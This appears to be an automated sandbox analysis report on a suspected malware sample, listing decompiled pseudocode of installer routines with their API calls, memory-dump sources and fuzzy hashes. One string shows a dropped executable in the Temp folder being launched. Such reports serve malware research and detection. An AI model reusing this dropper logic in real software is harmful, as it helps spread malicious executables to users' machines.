                • RegQueryValueExA.ADVAPI32(-00004250,0041FD08,00000000,?,?,00000006,?,00405BE9,80000002,Software\Microsoft\Windows\CurrentVersion,-00004250,C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,0041FD08), ref: 00405A25
                • RegCloseKey.ADVAPI32(-00004250,?,00405BE9,80000002,Software\Microsoft\Windows\CurrentVersion,-00004250,C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,0041FD08), ref: 00405A46
                Strings
                • C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx, xrefs: 004059DE
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: CloseOpenQueryValue
                • String ID: C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx
                • API String ID: 3677997916-1449584905
                • Opcode ID: 20ca1dc64cf80f35bde4a5a459f169022cfe0f17446037da1f5ac97088a586f8
                • Instruction ID: ed18225876ffcc918a102faa5279ae5b239897be87de75614ca521a3281ae21e
                • Opcode Fuzzy Hash: 20ca1dc64cf80f35bde4a5a459f169022cfe0f17446037da1f5ac97088a586f8
                • Instruction Fuzzy Hash: 91015A7114120EEFDB128F64EC84AEB3FACEF14398F004536F954A6120D235D964DFA5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004055E7(CHAR* _a4) {
                				CHAR* _t7;
                
                				_t7 = _a4;
                				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                					lstrcatA(_t7, 0x409010);
                				}
                				return _t7;
                			}

                APIs
                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004032E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 004055ED
                • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004032E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 004055F6
                • lstrcatA.KERNEL32(?,00409010), ref: 00405607
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 004055E7
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: CharPrevlstrcatlstrlen
                • String ID: C:\Users\user\AppData\Local\Temp\
                • API String ID: 2659869361-823278215
                • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                • Instruction ID: 96202b13295bd2e64ca1d8ffa69cec5526f215a27c510a3f916c0d268ec15c79
                • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                • Instruction Fuzzy Hash: 27D0A9A2609A302AE20232158C09F8F7A28CF42341B450822F100B2292C23C3C818BEE
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E00402366(void* __eax, void* __eflags) {
                				void* _t15;
                				char* _t18;
                				int _t19;
                				char _t24;
                				int _t27;
                				signed int _t30;
                				intOrPtr _t32;
                				void* _t37;
                
                				_t15 = E00402B7A(__eax);
                				_t32 =  *((intOrPtr*)(_t37 - 0x14));
                				 *(_t37 - 0x30) =  *(_t37 - 0x10);
                				 *(_t37 - 0x34) = E00402A85(2);
                				_t18 = E00402A85(0x11);
                				_t30 =  *0x423fd0; // 0x0
                				_t31 = _t30 | 0x00000002;
                				 *(_t37 - 4) = 1;
                				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
                				if(_t19 == 0) {
                					if(_t32 == 1) {
                						E00402A85(0x23);
                						_t19 = lstrlenA(0x409bf8) + 1;
                					}
                					if(_t32 == 4) {
                						_t24 = E00402A68(3);
                						 *0x409bf8 = _t24;
                						_t19 = _t32;
                					}
                					if(_t32 == 3) {
                						_t19 = E00402F71(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x409bf8, 0xc00);
                					}
                					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x34), _t27,  *(_t37 - 0x30), 0x409bf8, _t19) == 0) {
                						 *(_t37 - 4) = _t27;
                					}
                					_push( *(_t37 + 8));
                					RegCloseKey();
                				}
                				 *0x423fa8 =  *0x423fa8 +  *(_t37 - 4);
                				return 0;
                			}

                APIs
                • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023A4
                • lstrlenA.KERNEL32(00409BF8,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023C4
                • RegSetValueExA.ADVAPI32(?,?,?,?,00409BF8,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023FD
                • RegCloseKey.ADVAPI32(?,?,?,00409BF8,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024E0
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: CloseCreateValuelstrlen
                • String ID:
                • API String ID: 1356686001-0
                • Opcode ID: 44def8dede3c5aed97e6aa108d3f1f6d7508e3697ad605c69ac53dd4d90f4f06
                • Instruction ID: 1ead33bacdad0c85318cdbd94ecebf1695d3cac277658b50cebc1fb2c1fe2d1b
                • Opcode Fuzzy Hash: 44def8dede3c5aed97e6aa108d3f1f6d7508e3697ad605c69ac53dd4d90f4f06
                • Instruction Fuzzy Hash: 4A116071E00109BFEB109FA1EE89EAF7A78EB54398F11403AF905B71D1D6B85D019A68
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 93%
                			E004021C8(void* __eflags) {
                				void* __ebx;
                				char _t34;
                				CHAR* _t36;
                				CHAR* _t38;
                				void* _t41;
                
                				_t38 = E00402A85(_t34);
                				 *(_t41 + 8) = _t38;
                				_t36 = E00402A85(0x11);
                				if(E00405D9C(_t38) != 0) {
                					 *(_t41 - 0x54) =  *(_t41 - 8);
                					 *((intOrPtr*)(_t41 - 0x50)) = 2;
                					( &(_t38[1]))[lstrlenA(_t38)] = _t34;
                					( &(_t36[1]))[lstrlenA(_t36)] = _t34;
                					E00405B16(_t34, _t36, 0x409bf8, 0x409bf8, 0xfffffff8);
                					lstrcatA(0x409bf8, _t36);
                					 *(_t41 - 0x4c) =  *(_t41 + 8);
                					 *(_t41 - 0x48) = _t36;
                					 *(_t41 - 0x3a) = 0x409bf8;
                					 *((short*)(_t41 - 0x44)) =  *((intOrPtr*)(_t41 - 0x1c));
                					E00404E9F(_t34, 0x409bf8);
                					if(SHFileOperationA(_t41 - 0x54) != 0) {
                						goto L1;
                					}
                				} else {
                					L1:
                					E00404E9F(0xfffffff9, _t34);
                					 *((intOrPtr*)(_t41 - 4)) = 1;
                				}
                				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t41 - 4));
                				return 0;
                			}

                APIs
                  • Part of subcall function 00405D9C: SetErrorMode.KERNELBASE(00008001,00000000,C:\,?,0040570B,C:\,C:\,00000000,C:\,C:\,?,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,76DDF560,0040543A,?,76DDF560), ref: 00405DAA
                  • Part of subcall function 00405D9C: FindFirstFileA.KERNELBASE(?,00422580), ref: 00405DB6
                  • Part of subcall function 00405D9C: SetErrorMode.KERNELBASE(00000000), ref: 00405DC0
                  • Part of subcall function 00405D9C: FindClose.KERNELBASE(00000000), ref: 00405DC8
                • lstrlenA.KERNEL32 ref: 00402201
                • lstrlenA.KERNEL32(00000000), ref: 0040220B
                • lstrcatA.KERNEL32(00409BF8,00000000,00409BF8,000000F8,00000000), ref: 00402223
                • SHFileOperationA.SHELL32(?,?,00409BF8,00409BF8,00000000,00409BF8,000000F8,00000000), ref: 00402247
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: ErrorFileFindModelstrlen$CloseFirstOperationlstrcat
                • String ID:
                • API String ID: 2246384517-0
                • Opcode ID: a004e70d55816916d6918ca924290d61a23b4e1e6597895eda44e8916ffc4c11
                • Instruction ID: a3fb08b87a3da4a4acbea606a4f252bd6f521f47b87daa54263f745b893ff540
                • Opcode Fuzzy Hash: a004e70d55816916d6918ca924290d61a23b4e1e6597895eda44e8916ffc4c11
                • Instruction Fuzzy Hash: 36119171E04215AACB10EFEA8D4498EB7B8AF45314F10813BF510F72D2DABC99418BA9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 85%
                			E00401F20(char __ebx, char* __edi, char* __esi) {
                				char* _t18;
                				int _t19;
                				void* _t30;
                
                				_t18 = E00402A85(0xffffffee);
                				 *(_t30 - 0x2c) = _t18;
                				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
                				 *__esi = __ebx;
                				 *(_t30 - 0x3c) = _t19;
                				 *__edi = __ebx;
                				 *((intOrPtr*)(_t30 - 4)) = 1;
                				if(_t19 != __ebx) {
                					__eax = GlobalAlloc(0x40, __eax);
                					 *(__ebp + 8) = __eax;
                					if(__eax != __ebx) {
                						if(__eax != 0) {
                							__ebp - 0x34 = __ebp - 8;
                							if(VerQueryValueA( *(__ebp + 8), 0x409010, __ebp - 8, __ebp - 0x34) != 0) {
                								 *(__ebp - 8) = E00405A52(__esi,  *((intOrPtr*)( *(__ebp - 8) + 8)));
                								 *(__ebp - 8) = E00405A52(__edi,  *((intOrPtr*)( *(__ebp - 8) + 0xc)));
                								 *((intOrPtr*)(__ebp - 4)) = __ebx;
                							}
                						}
                						_push( *(__ebp + 8));
                						GlobalFree();
                					}
                				}
                				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t30 - 4));
                				return 0;
                			}

                APIs
                • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401F2F
                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F4D
                • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F66
                • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F7F
                  • Part of subcall function 00405A52: wsprintfA.USER32 ref: 00405A5F
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                • String ID:
                • API String ID: 1404258612-0
                • Opcode ID: b638af819fa124869f4f0744651443bd380a3e7449b22e631ddc4b1f11902375
                • Instruction ID: 664519773470a51a07128ab34de84be56150192837950b593d79a90dcc03585f
                • Opcode Fuzzy Hash: b638af819fa124869f4f0744651443bd380a3e7449b22e631ddc4b1f11902375
                • Instruction Fuzzy Hash: 3F115EB1A00108BFDB01AFA5DD81EEEBBB8EF44344F10803AF505F21A1D7789A54DB28
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 61%
                			E00401D68() {
                				void* __esi;
                				int _t6;
                				signed char _t11;
                				struct HFONT__* _t14;
                				void* _t18;
                				void* _t24;
                				void* _t26;
                				void* _t28;
                
                				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
                				0x4093bc->lfHeight =  ~(MulDiv(E00402A68(2), _t6, 0x48));
                				 *0x4093cc = E00402A68(3);
                				_t11 =  *((intOrPtr*)(_t28 - 0x14));
                				 *0x4093d3 = 1;
                				 *0x4093d0 = _t11 & 0x00000001;
                				 *0x4093d1 = _t11 & 0x00000002;
                				 *0x4093d2 = _t11 & 0x00000004;
                				E00405B16(_t18, _t24, _t26, 0x4093d8,  *((intOrPtr*)(_t28 - 0x20)));
                				_t14 = CreateFontIndirectA(0x4093bc);
                				_push(_t14);
                				_push(_t26);
                				E00405A52();
                				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t28 - 4));
                				return 0;
                			}












                APIs
                • GetDC.USER32(?), ref: 00401D6F
                • GetDeviceCaps.GDI32(00000000), ref: 00401D76
                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D85
                • CreateFontIndirectA.GDI32(004093BC), ref: 00401DD7
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: CapsCreateDeviceFontIndirect
                • String ID:
                • API String ID: 3272661963-0
                • Opcode ID: 39ab024a4e29bd2e00a8025c4fb31945af92016a005f7318998ecfc7e748a056
                • Instruction ID: ab44fcfaedae078b8a2075b08ba9bdacc1048924ee142b10c901050df09d38a1
                • Opcode Fuzzy Hash: 39ab024a4e29bd2e00a8025c4fb31945af92016a005f7318998ecfc7e748a056
                • Instruction Fuzzy Hash: C8F04471949240AFEB015BB0AE1AB9A3B689719705F145479F641B61E3C6BC19048F2E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00404DEF(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                				long _t22;
                
                				if(_a8 != 0x102) {
                					if(_a8 != 0x200) {
                						_t22 = _a16;
                						L7:
                						if(_a8 == 0x419 &&  *0x420518 != _t22) {
                							 *0x420518 = _t22;
                							E00405AF4(0x420530, 0x424000);
                							E00405A52(0x424000, _t22);
                							E0040140B(6);
                							E00405AF4(0x424000, 0x420530);
                						}
                						L11:
                						return CallWindowProcA( *0x420520, _a4, _a8, _a12, _t22);
                					}
                					if(IsWindowVisible(_a4) == 0) {
                						L10:
                						_t22 = _a16;
                						goto L11;
                					}
                					_t22 = E0040476E(_a4, 1);
                					_a8 = 0x419;
                					goto L7;
                				}
                				if(_a12 != 0x20) {
                					goto L10;
                				}
                				E00403F41(0x413);
                				return 0;
                			}





                APIs
                • IsWindowVisible.USER32(?), ref: 00404E25
                • CallWindowProcA.USER32 ref: 00404E93
                  • Part of subcall function 00403F41: SendMessageA.USER32 ref: 00403F53
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: Window$CallMessageProcSendVisible
                • String ID:
                • API String ID: 3748168415-3916222277
                • Opcode ID: 502464d238130af793e5dd4416e0b03d6a5de7fe60fe2b59f7980452aa14ff43
                • Instruction ID: 29fcd441dffe1e7b6305a3cd4593f976d2a152948ddea41a7ee803b159643aa2
                • Opcode Fuzzy Hash: 502464d238130af793e5dd4416e0b03d6a5de7fe60fe2b59f7980452aa14ff43
                • Instruction Fuzzy Hash: B1113071600218BBDF219F91EC40A9B3769BF84765F00813AFA08691A2C7B94D91DFED
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00402521(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                				int _t5;
                				long _t7;
                				struct _OVERLAPPED* _t11;
                				intOrPtr* _t15;
                				void* _t17;
                				int _t21;
                
                				_t15 = __esi;
                				_t11 = __ebx;
                				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
                					_t7 = lstrlenA(E00402A85(0x11));
                				} else {
                					E00402A68(1);
                					 *0x4097f8 = __al;
                				}
                				if( *_t15 == _t11) {
                					L8:
                					 *((intOrPtr*)(_t17 - 4)) = 1;
                				} else {
                					_t5 = WriteFile(E00405A6B(_t17 + 8, _t15), "C:\Users\alfons\AppData\Local\Temp", _t7, _t17 + 8, _t11);
                					_t21 = _t5;
                					if(_t21 == 0) {
                						goto L8;
                					}
                				}
                				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t17 - 4));
                				return 0;
                			}










                APIs
                • lstrlenA.KERNEL32(00000000,00000011), ref: 0040253F
                • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp,00000000,?,?,00000000,00000011), ref: 0040255E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: FileWritelstrlen
                • String ID: C:\Users\user\AppData\Local\Temp
                • API String ID: 427699356-1943935188
                • Opcode ID: 43c287db0b9488ba1958c90e0c04839735a403a3c50cc02975388901bfa035a1
                • Instruction ID: f3470f1ba8555a22246df6218562ebca8c23e151121f121bd8a2f796b88427a7
                • Opcode Fuzzy Hash: 43c287db0b9488ba1958c90e0c04839735a403a3c50cc02975388901bfa035a1
                • Instruction Fuzzy Hash: 97F0BE72A44241BED710EFA09E99AEF76A8CB00309F10043BB142F60C2D6FC4B419B2E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405E13(int _a4) {
                				struct tagMSG _v32;
                				int _t5;
                				int _t9;
                
                				_t9 = _a4;
                				while(1) {
                					_t5 = PeekMessageA( &_v32, 0, _t9, _t9, 1);
                					if(_t5 == 0) {
                						break;
                					}
                					DispatchMessageA( &_v32);
                				}
                				return _t5;
                			}







                APIs
                • DispatchMessageA.USER32 ref: 00405E2A
                • PeekMessageA.USER32(?,00000000,?,?,00000001), ref: 00405E3A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: Message$DispatchPeek
                • String ID: tCPInfo
                • API String ID: 1770753511-2120998202
                • Opcode ID: 427dd6a18e7e0659736ce79ff26561a4230ba81269168d82dcbc505d24d2deb6
                • Instruction ID: b418400924ad5d261256fe136df885be693c5a8b8b6dcaec19dd907e9b62b21e
                • Opcode Fuzzy Hash: 427dd6a18e7e0659736ce79ff26561a4230ba81269168d82dcbc505d24d2deb6
                • Instruction Fuzzy Hash: B7E08673900118A7CA10AB99DC09ECB776CDB95750F004032FA01F71C4D6B4FA018AF5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040562E(char* _a4) {
                				char* _t3;
                				char* _t5;
                
                				_t5 = _a4;
                				_t3 =  &(_t5[lstrlenA(_t5)]);
                				while( *_t3 != 0x5c) {
                					_t3 = CharPrevA(_t5, _t3);
                					if(_t3 > _t5) {
                						continue;
                					}
                					break;
                				}
                				 *_t3 =  *_t3 & 0x00000000;
                				return  &(_t3[1]);
                			}






                APIs
                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CEA,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\O1ySvN9SvL.exe,C:\Users\user\Desktop\O1ySvN9SvL.exe,80000000,00000003), ref: 00405634
                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CEA,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\O1ySvN9SvL.exe,C:\Users\user\Desktop\O1ySvN9SvL.exe,80000000,00000003), ref: 00405642
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: CharPrevlstrlen
                • String ID: C:\Users\user\Desktop
                • API String ID: 2709904686-1246513382
                • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                • Instruction ID: 55d490dd391442433e5efd6983ceb3f41bba8d4964d1e45b55f62cb9bfffce1e
                • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                • Instruction Fuzzy Hash: EBD0C7A2409EB05EF30362149C04B9F7A58DF16711F494862F544A62A1C2785C428FAD
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405740(CHAR* _a4, CHAR* _a8) {
                				int _t10;
                				int _t15;
                				CHAR* _t16;
                
                				_t15 = lstrlenA(_a8);
                				_t16 = _a4;
                				while(lstrlenA(_t16) >= _t15) {
                					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                					_t10 = lstrcmpiA(_t16, _a8);
                					if(_t10 == 0) {
                						return _t16;
                					}
                					_t16 = CharNextA(_t16);
                				}
                				return 0;
                			}







                APIs
                • lstrlenA.KERNEL32(?,?,00000000,00000000,0040594E,00000000,[Rename]), ref: 00405747
                • lstrcmpiA.KERNEL32(?,?,?,?,?,00000000,00000000,0040594E,00000000,[Rename]), ref: 00405760
                • CharNextA.USER32(?), ref: 0040576E
                • lstrlenA.KERNEL32(?,?,?,00000000,00000000,0040594E,00000000,[Rename]), ref: 00405777
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: lstrlen$CharNextlstrcmpi
                • String ID:
                • API String ID: 190613189-0
                • Opcode ID: 2e32237a626722e8137879666343952be07cc79a6fe12a37d3b79e97bd5271ec
                • Instruction ID: aca38312d8f432cd573fb0c64364face36d8f92203a8fe78b636acf1828773cc
                • Opcode Fuzzy Hash: 2e32237a626722e8137879666343952be07cc79a6fe12a37d3b79e97bd5271ec
